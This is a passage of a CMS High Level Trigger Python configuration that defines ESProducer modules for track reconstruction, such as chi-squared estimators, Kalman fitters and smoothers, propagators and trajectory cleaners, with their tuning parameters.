clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutNone" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeMeasurementEstimator9ForHI = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeMeasurementEstimator9ForHI" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutForHI" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2ChargeTightMeasurementEstimator16 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2ChargeTightMeasurementEstimator16" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator100 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 40.0 ),
nSigma = cms.double( 4.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1.0E12 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator100" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator16 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 16.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator16" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator30 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator30" ),
appendToDataLabel = cms.string( "" )
)
hltESPChi2MeasurementEstimator9 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPChi2MeasurementEstimator9" ),
appendToDataLabel = cms.string( "" )
)
hltESPCloseComponentsMerger5D = cms.ESProducer( "CloseComponentsMergerESProducer5D",
ComponentName = cms.string( "hltESPCloseComponentsMerger5D" ),
MaxComponents = cms.int32( 12 ),
DistanceMeasure = cms.string( "hltESPKullbackLeiblerDistance5D" )
)
hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPDetachedQuadStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPDetachedQuadStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedQuadStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDetachedStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPDetachedTripletStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPDetachedTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPDetachedTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.13 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPDisplacedDijethltPromptTrackCountingESProducer = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.1 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltESPDisplacedDijethltPromptTrackCountingESProducerLong = cms.ESProducer( "PromptTrackCountingESProducer",
impactParameterType = cms.int32( 1 ),
minimumImpactParameter = cms.double( -1.0 ),
useSignedImpactParameterSig = cms.bool( True ),
maximumDistanceToJetAxis = cms.double( 999999.0 ),
deltaR = cms.double( -1.0 ),
deltaRmin = cms.double( 0.0 ),
maximumDecayLength = cms.double( 999999.0 ),
maxImpactParameter = cms.double( 0.2 ),
maxImpactParameterSig = cms.double( 999999.0 ),
trackQualityClass = cms.string( "any" ),
nthTrack = cms.int32( -1 )
)
hltESPDisplacedDijethltTrackCounting2D1st = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.05 ),
useSignedImpactParameterSig = cms.bool( False ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 1 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPDisplacedDijethltTrackCounting2D2ndLong = cms.ESProducer( "TrackCountingESProducer",
a_dR = cms.double( -0.001053 ),
b_dR = cms.double( 0.6263 ),
a_pT = cms.double( 0.005263 ),
b_pT = cms.double( 0.3684 ),
min_pT = cms.double( 120.0 ),
max_pT = cms.double( 500.0 ),
min_pT_dRcut = cms.double( 0.5 ),
max_pT_dRcut = cms.double( 0.1 ),
max_pT_trackPTcut = cms.double( 3.0 ),
minimumImpactParameter = cms.double( 0.2 ),
useSignedImpactParameterSig = cms.bool( True ),
impactParameterType = cms.int32( 1 ),
maximumDistanceToJetAxis = cms.double( 9999999.0 ),
deltaR = cms.double( -1.0 ),
maximumDecayLength = cms.double( 999999.0 ),
nthTrack = cms.int32( 2 ),
trackQualityClass = cms.string( "any" ),
useVariableJTA = cms.bool( False )
)
hltESPDummyDetLayerGeometry = cms.ESProducer( "DetLayerGeometryESProducer",
ComponentName = cms.string( "hltESPDummyDetLayerGeometry" )
)
hltESPEcalTrigTowerConstituentsMapBuilder = cms.ESProducer( "EcalTrigTowerConstituentsMapBuilder",
MapFile = cms.untracked.string( "Geometry/EcalMapping/data/EndCap_TTMap.txt" )
)
hltESPElectronMaterialEffects = cms.ESProducer( "GsfMaterialEffectsESProducer",
BetheHeitlerParametrization = cms.string( "BetheHeitler_cdfmom_nC6_O5.par" ),
EnergyLossUpdator = cms.string( "GsfBetheHeitlerUpdator" ),
ComponentName = cms.string( "hltESPElectronMaterialEffects" ),
MultipleScatteringUpdator = cms.string( "MultipleScatteringUpdator" ),
Mass = cms.double( 5.11E-4 ),
BetheHeitlerCorrection = cms.int32( 2 )
)
hltESPFastSteppingHelixPropagatorAny = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPFastSteppingHelixPropagatorAny" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "anyDirection" ),
useTuningForL2Speed = cms.bool( True ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPFastSteppingHelixPropagatorOpposite = cms.ESProducer( "SteppingHelixPropagatorESProducer",
ComponentName = cms.string( "hltESPFastSteppingHelixPropagatorOpposite" ),
NoErrorPropagation = cms.bool( False ),
PropagationDirection = cms.string( "oppositeToMomentum" ),
useTuningForL2Speed = cms.bool( True ),
useIsYokeFlag = cms.bool( True ),
endcapShiftInZNeg = cms.double( 0.0 ),
SetVBFPointer = cms.bool( False ),
AssumeNoMaterial = cms.bool( False ),
endcapShiftInZPos = cms.double( 0.0 ),
useInTeslaFromMagField = cms.bool( False ),
VBFName = cms.string( "VolumeBasedMagneticField" ),
useEndcapShiftsInZ = cms.bool( False ),
sendLogWarning = cms.bool( False ),
useMatVolumes = cms.bool( True ),
debug = cms.bool( False ),
ApplyRadX0Correction = cms.bool( True ),
useMagVolumes = cms.bool( True ),
returnTangentPlane = cms.bool( True )
)
hltESPFittingSmootherIT = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFittingSmootherIT" ),
Fitter = cms.string( "hltESPTrajectoryFitterRK" ),
Smoother = cms.string( "hltESPTrajectorySmootherRK" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPFittingSmootherRK = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFittingSmootherRK" ),
Fitter = cms.string( "hltESPTrajectoryFitterRK" ),
Smoother = cms.string( "hltESPTrajectorySmootherRK" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPFlexibleKFFittingSmoother = cms.ESProducer( "FlexibleKFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPFlexibleKFFittingSmoother" ),
standardFitter = cms.string( "hltESPKFFittingSmootherWithOutliersRejectionAndRK" ),
looperFitter = cms.string( "hltESPKFFittingSmootherForLoopers" ),
appendToDataLabel = cms.string( "" )
)
hltESPFwdElectronPropagator = cms.ESProducer( "PropagatorWithMaterialESProducer",
SimpleMagneticField = cms.string( "" ),
MaxDPhi = cms.double( 1.6 ),
ComponentName = cms.string( "hltESPFwdElectronPropagator" ),
Mass = cms.double( 5.11E-4 ),
PropagationDirection = cms.string( "alongMomentum" ),
useRungeKutta = cms.bool( False ),
ptMin = cms.double( -1.0 )
)
hltESPGlobalDetLayerGeometry = cms.ESProducer( "GlobalDetLayerGeometryESProducer",
ComponentName = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPGlobalTrackingGeometryESProducer = cms.ESProducer( "GlobalTrackingGeometryESProducer" )
hltESPGsfElectronFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPGsfElectronFittingSmoother" ),
Fitter = cms.string( "hltESPGsfTrajectoryFitter" ),
Smoother = cms.string( "hltESPGsfTrajectorySmoother" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPGsfTrajectoryFitter = cms.ESProducer( "GsfTrajectoryFitterESProducer",
Merger = cms.string( "hltESPCloseComponentsMerger5D" ),
ComponentName = cms.string( "hltESPGsfTrajectoryFitter" ),
MaterialEffectsUpdator = cms.string( "hltESPElectronMaterialEffects" ),
GeometricalPropagator = cms.string( "hltESPAnalyticalPropagator" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPGsfTrajectorySmoother = cms.ESProducer( "GsfTrajectorySmootherESProducer",
Merger = cms.string( "hltESPCloseComponentsMerger5D" ),
ComponentName = cms.string( "hltESPGsfTrajectorySmoother" ),
MaterialEffectsUpdator = cms.string( "hltESPElectronMaterialEffects" ),
ErrorRescaling = cms.double( 100.0 ),
GeometricalPropagator = cms.string( "hltESPBwdAnalyticalPropagator" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" )
)
hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPHighPtTripletStepChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPInitialStepChi2ChargeMeasurementEstimator30 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 30.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPInitialStepChi2ChargeMeasurementEstimator30" ),
pTChargeCutThreshold = cms.double( 15.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutLoose" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPInitialStepChi2MeasurementEstimator36 = cms.ESProducer( "Chi2MeasurementEstimatorESProducer",
MaxChi2 = cms.double( 36.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 100.0 ),
MaxSagitta = cms.double( -1.0 ),
MinimalTolerance = cms.double( 10.0 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPInitialStepChi2MeasurementEstimator36" ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmoother = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmoother" ),
Fitter = cms.string( "hltESPKFTrajectoryFitter" ),
Smoother = cms.string( "hltESPKFTrajectorySmoother" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherForL2Muon = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherForL2Muon" ),
Fitter = cms.string( "hltESPKFTrajectoryFitterForL2Muon" ),
Smoother = cms.string( "hltESPKFTrajectorySmootherForL2Muon" ),
EstimateCut = cms.double( -1.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 5 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( False ),
NoInvalidHitsBeginEnd = cms.bool( False ),
LogPixelProbabilityCut = cms.double( -16.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherForLoopers = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherForLoopers" ),
Fitter = cms.string( "hltESPKFTrajectoryFitterForLoopers" ),
Smoother = cms.string( "hltESPKFTrajectorySmootherForLoopers" ),
EstimateCut = cms.double( 20.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -14.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFFittingSmootherWithOutliersRejectionAndRK = cms.ESProducer( "KFFittingSmootherESProducer",
ComponentName = cms.string( "hltESPKFFittingSmootherWithOutliersRejectionAndRK" ),
Fitter = cms.string( "hltESPRKTrajectoryFitter" ),
Smoother = cms.string( "hltESPRKTrajectorySmoother" ),
EstimateCut = cms.double( 20.0 ),
MaxFractionOutliers = cms.double( 0.3 ),
MaxNumberOfOutliers = cms.int32( 3 ),
MinDof = cms.int32( 2 ),
NoOutliersBeginEnd = cms.bool( False ),
MinNumberOfHits = cms.int32( 3 ),
MinNumberOfHitsHighEta = cms.int32( 5 ),
HighEtaSwitch = cms.double( 5.0 ),
RejectTracks = cms.bool( True ),
BreakTrajWith2ConsecutiveMissing = cms.bool( True ),
NoInvalidHitsBeginEnd = cms.bool( True ),
LogPixelProbabilityCut = cms.double( -14.0 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitter" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitterForL2Muon = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitterForL2Muon" ),
Propagator = cms.string( "hltESPFastSteppingHelixPropagatorAny" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectoryFitterForLoopers = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPKFTrajectoryFitterForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmoother = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmoother" ),
Propagator = cms.string( "PropagatorWithMaterialParabolicMf" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForL2Muon = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForL2Muon" ),
Propagator = cms.string( "hltESPFastSteppingHelixPropagatorOpposite" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 100.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForLoopers = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForLoopers" ),
Propagator = cms.string( "PropagatorWithMaterialForLoopers" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPGlobalDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFTrajectorySmootherForMuonTrackLoader = cms.ESProducer( "KFTrajectorySmootherESProducer",
ComponentName = cms.string( "hltESPKFTrajectorySmootherForMuonTrackLoader" ),
Propagator = cms.string( "hltESPSmartPropagatorAnyOpposite" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
errorRescaling = cms.double( 10.0 ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPKFUpdator = cms.ESProducer( "KFUpdatorESProducer",
ComponentName = cms.string( "hltESPKFUpdator" )
)
hltESPKullbackLeiblerDistance5D = cms.ESProducer( "DistanceBetweenComponentsESProducer5D",
ComponentName = cms.string( "hltESPKullbackLeiblerDistance5D" ),
DistanceMeasure = cms.string( "KullbackLeibler" )
)
hltESPL3MuKFTrajectoryFitter = cms.ESProducer( "KFTrajectoryFitterESProducer",
ComponentName = cms.string( "hltESPL3MuKFTrajectoryFitter" ),
Propagator = cms.string( "hltESPSmartPropagatorAny" ),
Updator = cms.string( "hltESPKFUpdator" ),
Estimator = cms.string( "hltESPChi2MeasurementEstimator30" ),
RecoGeometry = cms.string( "hltESPDummyDetLayerGeometry" ),
minHits = cms.int32( 3 ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPLowPtQuadStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtQuadStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtQuadStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPLowPtStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
fractionShared = cms.double( 0.16 ),
ValidHitBonus = cms.double( 5.0 ),
MissingHitPenalty = cms.double( 20.0 ),
allowSharedFirstHit = cms.bool( True )
)
hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9 = cms.ESProducer( "Chi2ChargeMeasurementEstimatorESProducer",
MaxChi2 = cms.double( 9.0 ),
nSigma = cms.double( 3.0 ),
MaxDisplacement = cms.double( 0.5 ),
MaxSagitta = cms.double( 2.0 ),
MinimalTolerance = cms.double( 0.5 ),
MinPtForHitRecoveryInGluedDet = cms.double( 1000000.0 ),
ComponentName = cms.string( "hltESPLowPtTripletStepChi2ChargeMeasurementEstimator9" ),
pTChargeCutThreshold = cms.double( -1.0 ),
clusterChargeCut = cms.PSet( refToPSet_ = cms.string( "HLTSiStripClusterChargeCutTight" ) ),
appendToDataLabel = cms.string( "" )
)
hltESPLowPtTripletStepTrajectoryCleanerBySharedHits = cms.ESProducer( "TrajectoryCleanerESProducer",
ComponentName = cms.string( "hltESPLowPtTripletStepTrajectoryCleanerBySharedHits" ),
ComponentType = cms.string( "TrajectoryCleanerBySharedHits" ),
